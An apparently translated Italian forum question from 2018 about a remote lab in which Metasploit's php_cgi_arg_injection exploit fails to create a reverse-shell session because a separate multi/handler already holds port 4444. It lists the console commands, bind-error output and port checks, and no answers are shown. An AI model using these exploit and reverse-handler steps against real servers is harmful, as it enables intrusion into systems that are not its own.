php_cgi_arg_injection non riesce a collegarsi su 0.0.0.0 quando multi / handler è in esecuzione

2

Ho una configurazione del server in un laboratorio remoto che sto cercando di testare con php_cgi_arg_injection. L'exploit funziona, ma non viene creata alcuna sessione.

Il router di rete locale è configurato per port forwarding da 4444 a <Local IP> . Sto usando Kali Linux sul mio computer locale.

Console 1:

use exploit/multi/handler
set LHOST <Local IP>

Console 2:

use exploit/multi/http/php_cgi_arg_injection
set LHOST <External IP>
set RHOST <Target IP>

Output 1:

[*] Started reverse TCP handler on <Local IP>:4444 

Output 2:

[-] Handler failed to bind to <Local IP>:4444:-  -
[-] Handler failed to bind to 0.0.0.0:4444:-  -
[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).
[*] Exploit completed, but no session was created.

Non riesco a scoprire perché non riesca a collegarsi su 0.0.0.0.

Output di sudo lsof -i -P -n | grep LISTEN

ruby     2227 root    9u  IPv4  38502      0t0  TCP <Local IP>:4444 (LISTEN)

Output di nmap <External IP>

PORT     STATE SERVICE
4444/tcp open  krb524

Il link segnala che il mio 4444 esterno è aperto e l'ascoltatore risponde con una sessione aperta che muore immediatamente. (Comportamento previsto)

    
posta NictraSavios 14.02.2018 - 00:34
fonte

0 risposte

Leggi altre domande sui tag